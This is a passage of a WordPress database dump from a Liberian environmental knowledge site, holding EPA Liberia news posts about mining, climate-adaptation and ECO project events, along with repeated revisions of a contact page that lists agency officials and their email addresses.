Agency of Liberia (EPA) is holding a one-day Technical Inception &amp; Consultative Workshop in Kakata, Margibi County on “Strengthening governance, human rights and environmental management for artisanal mining sector through user-friendly tools, awareness and capacity building”. The workshop is being held to kick off the Environmental Governance Project funded by UNDP in partnership with Swedish International Development Cooperation Agency (Sida) under the Environmental Governance Programme (EGP). It is intended to prepare an Artisanal Small-scale Mining user-friendly handbook, which would strengthen governance, human rights and environmental management for the artisanal mining sector in Liberia and as well create awareness on global environmental values.</p>\n<!-- /wp:paragraph -->','EPA, Ministry of Mines and Energy hold Training on the development of user friendly handbook for artisanal and small scale miners in Liberia.','','inherit','closed','closed','','3297-revision-v1','','','2021-01-06 10:58:44','2021-01-06 10:58:44','',3297,'https://ekmsliberia.info/3297-revision-v1/',0,'revision','',0),(3307,42,'2021-01-12 14:36:11','2021-01-12 14:36:11','<!-- wp:paragraph -->\n<p>Held at Ministerial Complex in Congo Town, the project seeks to solve environmental issues by establishing self-sustaining environment. The project will also provide householders with training and experience in developing necessary model for environmental protection.</p>\n<!-- /wp:paragraph -->','The Environmental Protection Agency of Liberia (EPA) and her partners on Monday, January 11, 2021 launched Miss Earth Liberia ECO Project.','','publish','open','open','','the-environmental-protection-agency-of-liberia-epa-and-her-partners-on-monday-january-11-2021-launched-miss-earth-liberia-eco-project','','','2021-01-12 14:36:14','2021-01-12 14:36:14','',0,'https://ekmsliberia.info/?p=3307',187,'post','',0),(3309,42,'2021-01-12 14:35:15','2021-01-12 14:35:15','','','','inherit','open','closed','','eco-project','','','2021-01-12 14:35:36','2021-01-12 14:35:36','',3307,'https://ekmsliberia.info/wp-content/uploads/2021/01/eco-project.jpg',0,'attachment','image/jpeg',0),(3310,42,'2021-01-12 14:36:11','2021-01-12 14:36:11','<!-- wp:paragraph -->\n<p>Held at Ministerial Complex in Congo Town, the project seeks to solve environmental issues by establishing self-sustaining environment. The project will also provide householders with training and experience in developing necessary model for environmental protection.</p>\n<!-- /wp:paragraph -->','The Environmental Protection Agency of Liberia (EPA) and her partners on Monday, January 11, 2021 launched Miss Earth Liberia ECO Project.','','inherit','closed','closed','','3307-revision-v1','','','2021-01-12 14:36:11','2021-01-12 14:36:11','',3307,'https://ekmsliberia.info/3307-revision-v1/',0,'revision','',0),(3313,42,'2021-01-15 11:09:39','2021-01-15 11:09:39','<!-- wp:paragraph -->\n<p>The Environmental Protection Agency of Liberia (EPA) over the weekend (January 12, 2021) concluded a one-day stakeholders’ consultation for MNG Gold Underground Project in Kokoyah District, Bong County.The management of MNG Gold submitted a revised version of the approved 2015 Environmental and Social Impact Assessment (ESIA) for the Kokoya Gold Project. The revised document seeks an environmental permit for the operation of an underground gold mine in the existing open pit in Kokoya District, Bong County. The document was submitted to the EPA by Petra Resources, Inc an independent environmental consultant on behalf of MNG Gold.The ESIA document for the underground mine has been reviewed internally by the EPA’s ESIA Technical Review Committee in consultation with relevant ministries, agencies and commissions of the Liberian Government, as part of the fulfillment of the ESIA process.</p>\n<!-- /wp:paragraph -->','The EPA concluded a one-day stakeholders’ consultation for MNG Gold Underground Project in Kokoyah District, Bong County.','','publish','closed','open','','the-epa-concluded-a-one-day-stakeholders-consultation-for-mng-gold-underground-project-in-kokoyah-district-bong-county','','','2021-01-15 11:09:41','2021-01-15 11:09:41','',0,'https://ekmsliberia.info/?p=3313',186,'post','',0),(3314,42,'2021-01-15 11:08:58','2021-01-15 11:08:58','','','','inherit','open','closed','','news','','','2021-01-15 11:09:05','2021-01-15 11:09:05','',3313,'https://ekmsliberia.info/wp-content/uploads/2021/01/news.jpg',0,'attachment','image/jpeg',0),(3315,42,'2021-01-15 11:09:39','2021-01-15 11:09:39','<!-- wp:paragraph -->\n<p>The Environmental Protection Agency of Liberia (EPA) over the weekend (January 12, 2021) concluded a one-day stakeholders’ consultation for MNG Gold Underground Project in Kokoyah District, Bong County.The management of MNG Gold submitted a revised version of the approved 2015 Environmental and Social Impact Assessment (ESIA) for the Kokoya Gold Project. The revised document seeks an environmental permit for the operation of an underground gold mine in the existing open pit in Kokoya District, Bong County. The document was submitted to the EPA by Petra Resources, Inc an independent environmental consultant on behalf of MNG Gold.The ESIA document for the underground mine has been reviewed internally by the EPA’s ESIA Technical Review Committee in consultation with relevant ministries, agencies and commissions of the Liberian Government, as part of the fulfillment of the ESIA process.</p>\n<!-- /wp:paragraph -->','The EPA concluded a one-day stakeholders’ consultation for MNG Gold Underground Project in Kokoyah District, Bong County.','','inherit','closed','closed','','3313-revision-v1','','','2021-01-15 11:09:39','2021-01-15 11:09:39','',3313,'https://ekmsliberia.info/3313-revision-v1/',0,'revision','',0),(3316,42,'2021-01-15 11:16:28','2021-01-15 11:16:28','<!-- wp:paragraph -->\n<p>The closure meeting for the UNDP-supported Green Climate Fund (GCF) financed project “To Advance the National Adaptation Plans (NAP) process for medium-term investment planning in climate-sensitive sectors” was held at Bella Casa Hotel in Sinkor. The project was signed on October 16, 2017 by the Government of Liberia and UNDP while the inception meeting kicked off in March 2018.The closure meeting was intended to take stock of the NAP Project results, review and share experiences and lessons learnt from the project that can inform ongoing and emerging and new projects. The forum attracted over 60 participants including policy makers, project focal points, representatives from sectoral agencies and some experts who worked as consultants. Some officials of UNDP and EPA including the Agency\'s Executive Director, Prof. Wilson K. Tarpeh graced the occasion. Past activities and achievements of the project were showcased while a presentation on the project terminal evaluation report was also made. Participants discussed the terminal report and analyzed how Liberia can build upon and sustain the project gains.</p>\n<!-- /wp:paragraph -->','The EPA and the UNDP, on Wednesday, January 13, 2021 held the project closure meeting for the National Adaptation Plan (NAP) Project.','','publish','closed','closed','','the-epa-and-the-undp-on-wednesday-january-13-2021-held-the-project-closure-meeting-for-the-national-adaptation-plan-nap-project','','','2021-01-15 11:16:33','2021-01-15 11:16:33','',0,'https://ekmsliberia.info/?p=3316',185,'post','',0),(3317,42,'2021-01-15 11:15:42','2021-01-15 11:15:42','','nap','','inherit','open','closed','','nap','','','2021-01-15 11:15:42','2021-01-15 11:15:42','',3316,'https://ekmsliberia.info/wp-content/uploads/2021/01/nap.jpg',0,'attachment','image/jpeg',0),(3318,42,'2021-01-15 11:16:28','2021-01-15 11:16:28','<!-- wp:paragraph -->\n<p>The closure meeting for the UNDP-supported Green Climate Fund (GCF) financed project “To Advance the National Adaptation Plans (NAP) process for medium-term investment planning in climate-sensitive sectors” was held at Bella Casa Hotel in Sinkor. The project was signed on October 16, 2017 by the Government of Liberia and UNDP while the inception meeting kicked off in March 2018.The closure meeting was intended to take stock of the NAP Project results, review and share experiences and lessons learnt from the project that can inform ongoing and emerging and new projects. The forum attracted over 60 participants including policy makers, project focal points, representatives from sectoral agencies and some experts who worked as consultants. Some officials of UNDP and EPA including the Agency\'s Executive Director, Prof. Wilson K. Tarpeh graced the occasion. Past activities and achievements of the project were showcased while a presentation on the project terminal evaluation report was also made. Participants discussed the terminal report and analyzed how Liberia can build upon and sustain the project gains.</p>\n<!-- /wp:paragraph -->','The EPA and the UNDP, on Wednesday, January 13, 2021 held the project closure meeting for the National Adaptation Plan (NAP) Project.','','inherit','closed','closed','','3316-revision-v1','','','2021-01-15 11:16:28','2021-01-15 11:16:28','',3316,'https://ekmsliberia.info/3316-revision-v1/',0,'revision','',0),(3320,42,'2021-01-18 11:35:06','2021-01-18 11:35:06','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/IMG_20200908_105852_513-ox8vdkzpdt8ppuxyxbm48bx7zb2jsiz8d9tn48rp4w.jpg\" title=\"IMG_20200908_105852_513\" alt=\"IMG_20200908_105852_513\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer/UNCBD Focal Point<br />jcammue@epa.gov.lr</p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator/UNFCCC Focal Point<br />bkarmorh@epa.gov.lr</p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator/UNCCD Focal Point<br />bjallah@epa.gov.lr</p>		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_KT-ogrsfkuhth8i34pwnjn50y0fkk8oqc9g069ccc2ha8.jpg\" title=\"Kawusu Toure\" alt=\"Kawusu Toure\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>Jeremiah Sokan Sr</strong><br />Coordinator Climate Change Secretariat, EPA<br /><a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a></p><p><strong>John K. Jallah</strong><br />Manager - Compliance and Enforcement, EPA<br />jjallah@epa.gov.lr</p><p><strong>Kawusu Toure</strong><br />Assistant Manager - Compliance and Enforcement, ESIA, EPA<br />kawumtoure@gmail.com</p><p><strong>Konikay Nimely</strong><br />EIA Manager, FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamag@gmail.com\">blamag@gmail.com</a><br>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a><strong>Francis W. Mwah</strong><br>\nDirector @ MOA<br>\n<a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><strong>Urias Garsinii </strong><br>\nLand Use Management Manager, LLA<br>\n<a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/aw2.jpg\" title=\"aw2\" alt=\"aw2\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"AlFreeman\" alt=\"AlFreeman\" />											\n		<strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a><p><strong>Jesse Mathies</strong><br />Assistant Director, MOCI<br />Division of Foreign Trade<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer, MOCI<br />National Standard Laboratory<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"1\" alt=\"1\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards, MOCI<br />Bureau of Industrial Services<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer, MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-01-18 11:35:06','2021-01-18 11:35:06','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3321,42,'2021-01-18 11:35:06','2021-01-18 11:35:06','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/IMG_20200908_105852_513-ox8vdkzpdt8ppuxyxbm48bx7zb2jsiz8d9tn48rp4w.jpg\" title=\"IMG_20200908_105852_513\" alt=\"IMG_20200908_105852_513\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer/UNCBD Focal Point<br />jcammue@epa.gov.lr</p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator/UNFCCC Focal Point<br />bkarmorh@epa.gov.lr</p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator/UNCCD Focal Point<br />bjallah@epa.gov.lr</p>		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_KT-ogrsfkuhth8i34pwnjn50y0fkk8oqc9g069ccc2ha8.jpg\" title=\"Kawusu Toure\" alt=\"Kawusu Toure\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>Jeremiah Sokan Sr</strong><br />Coordinator Climate Change Secretariat, EPA<br /><a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a></p><p><strong>John K. Jallah</strong><br />Manager - Compliance and Enforcement, EPA<br />jjallah@epa.gov.lr</p><p><strong>Kawusu Toure</strong><br />Assistant Manager - Compliance and Enforcement, ESIA, EPA<br />kawumtoure@gmail.com</p><p><strong>Konikay Nimely</strong><br />EIA Manager, FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamag@gmail.com\">blamag@gmail.com</a><br>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a><strong>Francis W. Mwah</strong><br>\nDirector @ MOA<br>\n<a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><strong>Urias Garsinii </strong><br>\nLand Use Management Manager, LLA<br>\n<a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/aw2.jpg\" title=\"aw2\" alt=\"aw2\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"AlFreeman\" alt=\"AlFreeman\" />											\n		<strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a><p><strong>Jesse Mathies</strong><br />Assistant Director, MOCI<br />Division of Foreign Trade<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer, MOCI<br />National Standard Laboratory<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"1\" alt=\"1\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards, MOCI<br />Bureau of Industrial Services<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer, MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-01-18 11:35:06','2021-01-18 11:35:06','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3322,42,'2021-01-18 11:35:06','2021-01-18 11:35:06','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/IMG_20200908_105852_513-ox8vdkzpdt8ppuxyxbm48bx7zb2jsiz8d9tn48rp4w.jpg\" title=\"IMG_20200908_105852_513\" alt=\"IMG_20200908_105852_513\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer/UNCBD Focal Point<br />jcammue@epa.gov.lr</p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator/UNFCCC Focal Point<br />bkarmorh@epa.gov.lr</p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator/UNCCD Focal Point<br />bjallah@epa.gov.lr</p>		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_KT-ogrsfkuhth8i34pwnjn50y0fkk8oqc9g069ccc2ha8.jpg\" title=\"Kawusu Toure\" alt=\"Kawusu Toure\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>Jeremiah Sokan Sr</strong><br />Coordinator Climate Change Secretariat, EPA<br /><a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a></p><p><strong>John K. Jallah</strong><br />Manager - Compliance and Enforcement, EPA<br />jjallah@epa.gov.lr</p><p><strong>Kawusu Toure</strong><br />Assistant Manager - Compliance and Enforcement, ESIA, EPA<br />kawumtoure@gmail.com</p><p><strong>Konikay Nimely</strong><br />EIA Manager, FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamag@gmail.com\">blamag@gmail.com</a><br>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a><strong>Francis W. Mwah</strong><br>\nDirector @ MOA<br>\n<a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><strong>Urias Garsinii </strong><br>\nLand Use Management Manager, LLA<br>\n<a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/aw2.jpg\" title=\"aw2\" alt=\"aw2\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"AlFreeman\" alt=\"AlFreeman\" />											\n		<strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a><p><strong>Jesse Mathies</strong><br />Assistant Director, MOCI<br />Division of Foreign Trade<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer, MOCI<br />National Standard Laboratory<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"1\" alt=\"1\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards, MOCI<br />Bureau of Industrial Services<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer, MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>Ahmed Sheriff </strong><br />Director, NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Anthony Yokie</strong><br />Manager, NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Tonia Boah </strong><br />NaFAA<br />Monitoring, Control, and Surveillance Field Officer </p><p><strong>Joyce Kumeh</strong><br />NaFAA<br />Small Scale Fisheries Officer</p><p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Nadine Ajamia</strong><br />Policy Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector, LIMA<br />Department of Marine Environmental Protection</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-01-18 11:35:06','2021-01-18 11:35:06','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3324,42,'2021-01-18 11:43:07','2021-01-18 11:43:07','','','','inherit','open','closed','','so','','','2021-01-18 11:43:42','2021-01-18 11:43:42','',80,'https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg',0,'attachment','image/jpeg',0),(3325,42,'2021-01-18 11:43:55','2021-01-18 11:43:55','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/IMG_20200908_105852_513-ox8vdkzpdt8ppuxyxbm48bx7zb2jsiz8d9tn48rp4w.jpg\" title=\"IMG_20200908_105852_513\" alt=\"IMG_20200908_105852_513\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer/UNCBD Focal Point<br />jcammue@epa.gov.lr</p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator/UNFCCC Focal Point<br />bkarmorh@epa.gov.lr</p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator/UNCCD Focal Point<br />bjallah@epa.gov.lr</p>		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_KT-ogrsfkuhth8i34pwnjn50y0fkk8oqc9g069ccc2ha8.jpg\" title=\"Kawusu Toure\" alt=\"Kawusu Toure\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>Jeremiah Sokan Sr</strong><br />Coordinator Climate Change Secretariat, EPA<br /><a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a></p><p><strong>John K. Jallah</strong><br />Manager - Compliance and Enforcement, EPA<br />jjallah@epa.gov.lr</p><p><strong>Kawusu Toure</strong><br />Assistant Manager - Compliance and Enforcement, ESIA, EPA<br 